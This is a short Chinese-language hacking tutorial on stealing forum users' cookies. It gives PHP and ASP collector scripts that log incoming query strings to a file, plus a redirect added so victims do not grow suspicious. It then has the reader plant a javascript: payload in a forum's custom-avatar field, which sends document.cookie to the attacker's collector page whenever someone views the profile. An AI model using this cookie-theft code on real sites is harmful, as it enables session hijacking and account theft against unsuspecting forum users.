以下是获取cookie的php源代码:
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("test.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}
?>
<script language=vbscript>
document.location="http://my.51.net/bbs/"
</script>
如果得到cookie,则在空间中生成test.txt,为了不引起怀疑,将自动把网页转换到http://xiaomutou.51.net/bbs/,把它上传到支持php的空间上。比如这里我把它传到 http://my.51.net/info2.php 然后注册一个用户(强烈建议大家注册英文用户,如baobaoguai) 我们在“关于自定义头像”中插入如下代码:
java script:window.open('http://my.51.net/info2.php?'+document.cookie);
然后提交,现在这个的头像已经成了一段偷cookie的特殊代码。现在回到首页,看看在线成员列表,点我们刚才注册的用户,看,它弹出了两个窗口,一个是关于baobaoguai这个用户的资料,另一个则是http://my.51.net/bbs/
获取cookie的asp源代码:
<%
testfile=Server.MapPath("cookies.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
 |
